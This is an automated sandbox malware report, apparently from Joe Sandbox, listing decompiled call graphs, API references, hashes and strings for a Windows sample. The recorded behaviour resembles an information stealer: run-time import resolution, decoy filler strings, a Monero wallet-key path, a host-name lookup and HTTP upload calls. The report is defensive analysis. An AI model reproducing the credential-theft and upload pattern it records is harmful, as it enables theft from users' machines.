9a51cf 15894->15348 15898 9a7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15895->15898 15897 9a76b9 15897->15770 15897->15771 15899 9a7780 RegCloseKey 15898->15899 15900 9a7765 RegQueryValueExA 15898->15900 15901 9a7793 15899->15901 15900->15899 15901->15897 15902->15783 15904 9a89f9 GetProcessHeap HeapFree 15903->15904 15905 9a8a0c 15903->15905 15904->15905 15905->15811 15906->15811 15908 9aa7a0 lstrcpy 15907->15908 15909 995119 15908->15909 15910 9947b0 2 API calls 15909->15910 15911 995125 15910->15911 16067 9a8ea0 15911->16067 15913 995184 15914 995192 lstrlen 15913->15914 15915 9951a5 15914->15915 15916 9a8ea0 4 API calls 15915->15916 15917 9951b6 15916->15917 15918 9aa740 lstrcpy 15917->15918 15919 9951c9 15918->15919 15920 9aa740 lstrcpy 15919->15920 15921 9951d6 15920->15921 15922 9aa740 lstrcpy 15921->15922 15923 9951e3 15922->15923 15924 9aa740 lstrcpy 15923->15924 15925 9951f0 15924->15925 15926 9aa740 lstrcpy 15925->15926 15927 9951fd InternetOpenA StrCmpCA 15926->15927 15928 99522f 15927->15928 15929 9958c4 InternetCloseHandle 15928->15929 15930 9a8b60 3 API calls 15928->15930 15936 9958d9 ctype 15929->15936 15931 99524e 15930->15931 15932 9aa920 3 API calls 15931->15932 15933 995261 15932->15933 15934 9aa8a0 lstrcpy 15933->15934 15935 99526a 15934->15935 15937 9aa9b0 4 API calls 15935->15937 15940 9aa7a0 lstrcpy 15936->15940 15938 9952ab 15937->15938 15939 9aa920 3 API calls 15938->15939 15941 9952b2 15939->15941 15948 995913 15940->15948 15942 9aa9b0 4 API calls 15941->15942 15943 9952b9 15942->15943 15944 9aa8a0 lstrcpy 15943->15944 15945 9952c2 15944->15945 15946 9aa9b0 4 API calls 15945->15946 15947 995303 15946->15947 15949 9aa920 3 API calls 15947->15949 15948->15894 15950 99530a 15949->15950 15951 9aa8a0 lstrcpy 15950->15951 15952 995313 15951->15952 15953 995329 InternetConnectA 15952->15953 15953->15929 15954 995359 HttpOpenRequestA 15953->15954 15956 9958b7 InternetCloseHandle 15954->15956 15957 9953b7 15954->15957 15956->15929 15958 9aa9b0 4 API calls 15957->15958 15959 9953cb 15958->15959 15960 9aa8a0 lstrcpy 15959->15960 15961 9953d4 15960->15961 15962 9aa920 3 API calls 15961->15962 15963 9953f2 15962->15963 15964 9aa8a0 lstrcpy 15963->15964 15965 9953fb 15964->15965 15966 9aa9b0 4 API calls 15965->15966 15967 99541a 15966->15967 15968 9aa8a0 lstrcpy 15967->15968 15969 995423 15968->15969 15970 9aa9b0 4 API calls 15969->15970 15971 995444 15970->15971 15972 9aa8a0 lstrcpy 15971->15972 15973 99544d 15972->15973 15974 9aa9b0 4 API calls 15973->15974 15975 99546e 15974->15975 16068 9a8ea9 16067->16068 16069 9a8ead CryptBinaryToStringA 16067->16069 16068->15913 16069->16068 16070 9a8ece GetProcessHeap RtlAllocateHeap 16069->16070 16070->16068 16071 9a8ef4 ctype 16070->16071 16072 9a8f05 CryptBinaryToStringA 16071->16072 16072->16068 16076->15351 16319 999880 16077->16319 16079 9998e1 16079->15358 16081 9aa740 lstrcpy 16080->16081 16082 99fb16 16081->16082 16254 9aa740 lstrcpy 16253->16254 16255 9a0266 16254->16255 16256 9a8de0 2 API calls 16255->16256 16257 9a027b 16256->16257 16258 9aa920 3 API calls 16257->16258 16259 9a028b 16258->16259 16260 9aa8a0 lstrcpy 16259->16260 16261 9a0294 16260->16261 16262 9aa9b0 4 API calls 16261->16262 16320 99988e 16319->16320 16323 996fb0 16320->16323 16322 9998ad ctype 16322->16079 16326 996d40 16323->16326 16327 996d63 16326->16327 16341 996d59 16326->16341 16342 996530 16327->16342 16331 996dbe 16331->16341 16352 9969b0 16331->16352 16333 996e2a 16334 996ee6 VirtualFree 16333->16334 16336 996ef7 16333->16336 16333->16341 16334->16336 16335 996f41 16339 9a89f0 2 API calls 16335->16339 16335->16341 16336->16335 16337 996f38 16336->16337 16338 996f26 FreeLibrary 16336->16338 16340 9a89f0 2 API calls 16337->16340 16338->16336 16339->16341 16340->16335 16341->16322 16343 996542 16342->16343 16345 996549 16343->16345 16362 9a8a10 GetProcessHeap RtlAllocateHeap 16343->16362 16345->16341 16346 996660 16345->16346 16350 99668f VirtualAlloc 16346->16350 16348 996730 16349 996743 VirtualAlloc 16348->16349 16351 99673c 16348->16351 16349->16351 16350->16348 16350->16351 16351->16331 16353 9969c9 16352->16353 16357 9969d5 16352->16357 16354 996a09 LoadLibraryA 16353->16354 16353->16357 16355 996a32 16354->16355 16354->16357 16358 996ae0 16355->16358 16363 9a8a10 GetProcessHeap RtlAllocateHeap 16355->16363 16357->16333 16358->16357 16359 996ba8 GetProcAddress 16358->16359 16359->16357 16359->16358 16360 996a8b 16360->16357 16361 9a89f0 2 API calls 16360->16361 16361->16358 16362->16345 16363->16360

                        Executed Functions

                        Function 009A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 9a9860-9a9874 call 9a9750 663 9a987a-9a9a8e call 9a9780 GetProcAddress * 21 660->663 664 9a9a93-9a9af2 LoadLibraryA * 5 660->664 663->664 665 9a9b0d-9a9b14 664->665 666 9a9af4-9a9b08 GetProcAddress 664->666 669 9a9b46-9a9b4d 665->669 670 9a9b16-9a9b41 GetProcAddress * 2 665->670 666->665 671 9a9b68-9a9b6f 669->671 672 9a9b4f-9a9b63 GetProcAddress 669->672 670->669 673 9a9b89-9a9b90 671->673 674 9a9b71-9a9b84 GetProcAddress 671->674 672->671 675 9a9b92-9a9bbc GetProcAddress * 2 673->675 676 9a9bc1-9a9bc2 673->676 674->673 675->676
                        APIs
                        • GetProcAddress.KERNEL32(75900000,015B07C8), ref: 009A98A1
                        • GetProcAddress.KERNEL32(75900000,015B0810), ref: 009A98BA
                        • GetProcAddress.KERNEL32(75900000,015B0738), ref: 009A98D2
                        • GetProcAddress.KERNEL32(75900000,015B0828), ref: 009A98EA
                        • GetProcAddress.KERNEL32(75900000,015B06D8), ref: 009A9903
                        • GetProcAddress.KERNEL32(75900000,015B8A70), ref: 009A991B
                        • GetProcAddress.KERNEL32(75900000,015A64C0), ref: 009A9933
                        • GetProcAddress.KERNEL32(75900000,015A6440), ref: 009A994C
                        • GetProcAddress.KERNEL32(75900000,015B0630), ref: 009A9964
                        • GetProcAddress.KERNEL32(75900000,015B06F0), ref: 009A997C
                        • GetProcAddress.KERNEL32(75900000,015B0648), ref: 009A9995
                        • GetProcAddress.KERNEL32(75900000,015B0708), ref: 009A99AD
                        • GetProcAddress.KERNEL32(75900000,015A63C0), ref: 009A99C5
                        • GetProcAddress.KERNEL32(75900000,015B0768), ref: 009A99DE
                        • GetProcAddress.KERNEL32(75900000,015B0798), ref: 009A99F6
                        • GetProcAddress.KERNEL32(75900000,015A6280), ref: 009A9A0E
                        • GetProcAddress.KERNEL32(75900000,015B07B0), ref: 009A9A27
                        • GetProcAddress.KERNEL32(75900000,015B0900), ref: 009A9A3F
                        • GetProcAddress.KERNEL32(75900000,015A6620), ref: 009A9A57
                        • GetProcAddress.KERNEL32(75900000,015B0870), ref: 009A9A70
                        • GetProcAddress.KERNEL32(75900000,015A65A0), ref: 009A9A88
                        • LoadLibraryA.KERNEL32(015B0888,?,009A6A00), ref: 009A9A9A
                        • LoadLibraryA.KERNEL32(015B08D0,?,009A6A00), ref: 009A9AAB
                        • LoadLibraryA.KERNEL32(015B08E8,?,009A6A00), ref: 009A9ABD
                        • LoadLibraryA.KERNEL32(015B0918,?,009A6A00), ref: 009A9ACF
                        • LoadLibraryA.KERNEL32(015B0858,?,009A6A00), ref: 009A9AE0
                        • GetProcAddress.KERNEL32(75070000,015B08B8), ref: 009A9B02
                        • GetProcAddress.KERNEL32(75FD0000,015B08A0), ref: 009A9B23
                        • GetProcAddress.KERNEL32(75FD0000,015B8D90), ref: 009A9B3B
                        • GetProcAddress.KERNEL32(75A50000,015B8CB8), ref: 009A9B5D
                        • GetProcAddress.KERNEL32(74E50000,015A6560), ref: 009A9B7E
                        • GetProcAddress.KERNEL32(76E80000,015B8B20), ref: 009A9B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 009A9BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 009A9BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: f687af4f4d61e2d016cc136c33afbe23791c5d91cd408e99e874a058ad5c77d5
                        • Instruction ID: 9317364c7f60f8fde131eda1235a249acdd8fefea3c5f431858173410fdcdad6
                        • Opcode Fuzzy Hash: f687af4f4d61e2d016cc136c33afbe23791c5d91cd408e99e874a058ad5c77d5
                        • Instruction Fuzzy Hash: 9BA17DB56032419FC344EFA8EDB8A56BBF9F74C301704451BAA09C32A4FE3A9941DB57
                        Function 009945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 9945c0-994695 RtlAllocateHeap 781 9946a0-9946a6 764->781 782 9946ac-99474a 781->782 783 99474f-9947a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0099460E
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0099479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009946C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0099466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0099473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0099475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009945C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0099462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009946CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009945D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0099474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009945DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009946AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009945E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0099477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0099471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009946B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00994617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009946D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009945F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: eaff07b774fbf4364c0c3b988e58bcbe67d2a1f61f7fd23ea6891b943b33b3b5
                        • Instruction ID: 4bfef5eda39b7c482217e798fb0bff3af55072fe0d061c2ba370f918b0467219
                        • Opcode Fuzzy Hash: eaff07b774fbf4364c0c3b988e58bcbe67d2a1f61f7fd23ea6891b943b33b3b5
                        • Instruction Fuzzy Hash: 984116607FB60C7BC629BBE4D9CEFDE77667FC6F18F615844A80052280CAB069807525
                        Function 00994880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 994880-994942 call 9aa7a0 call 9947b0 call 9aa740 * 5 InternetOpenA StrCmpCA 816 99494b-99494f 801->816 817 994944 801->817 818 994ecb-994ef3 InternetCloseHandle call 9aaad0 call 999ac0 816->818 819 994955-994acd call 9a8b60 call 9aa920 call 9aa8a0 call 9aa800 * 2 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa920 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa920 call 9aa8a0 call 9aa800 * 2 InternetConnectA 816->819 817->816 829 994f32-994fa2 call 9a8990 * 2 call 9aa7a0 call 9aa800 * 8 818->829 830 994ef5-994f2d call 9aa820 call 9aa9b0 call 9aa8a0 call 9aa800 818->830 819->818 905 994ad3-994ad7 819->905 830->829 906 994ad9-994ae3 905->906 907 994ae5 905->907 908 994aef-994b22 HttpOpenRequestA 906->908 907->908 909 994b28-994e28 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa920 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa920 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa920 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa9b0 call 9aa8a0 call 9aa800 call 9aa920 call 9aa8a0 call 9aa800 call 9aa740 call 9aa920 * 2 call 9aa8a0 call 9aa800 * 2 call 9aaad0 lstrlen call 9aaad0 * 2 lstrlen call 9aaad0 HttpSendRequestA 908->909 910 994ebe-994ec5 InternetCloseHandle 908->910 1021 994e32-994e5c InternetReadFile 909->1021 910->818 1022 994e5e-994e65 1021->1022 1023 994e67-994eb9 InternetCloseHandle call 9aa800 1021->1023 1022->1023 1024 994e69-994ea7 call 9aa9b0 call 9aa8a0 call 9aa800 1022->1024 1023->910 1024->1021
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00994915
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 0099493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00994ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,009B0DDB,00000000,?,?,00000000,?,",00000000,?,015BE250), ref: 00994DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00994E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00994E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00994E49
                        • InternetCloseHandle.WININET(00000000), ref: 00994EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00994EC5
                        • HttpOpenRequestA.WININET(00000000,015BE3C0,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00994B15
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00994ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: d586725abb28b466d4a8824997486b6760cada0d54c79e0cac72513de0aa42d3
                        • Instruction ID: 0ac2a7cf61a213817ea9b44fd22b4fcbdbc0fe57c191912e8fe84b40adecfd44
                        • Opcode Fuzzy Hash: d586725abb28b466d4a8824997486b6760cada0d54c79e0cac72513de0aa42d3
                        • Instruction Fuzzy Hash: C7122C72910118ABDB55EB94DDA2FEEB338BF96300F504199B10663091EF742F49CFA6
                        Function 009A78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 009A792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
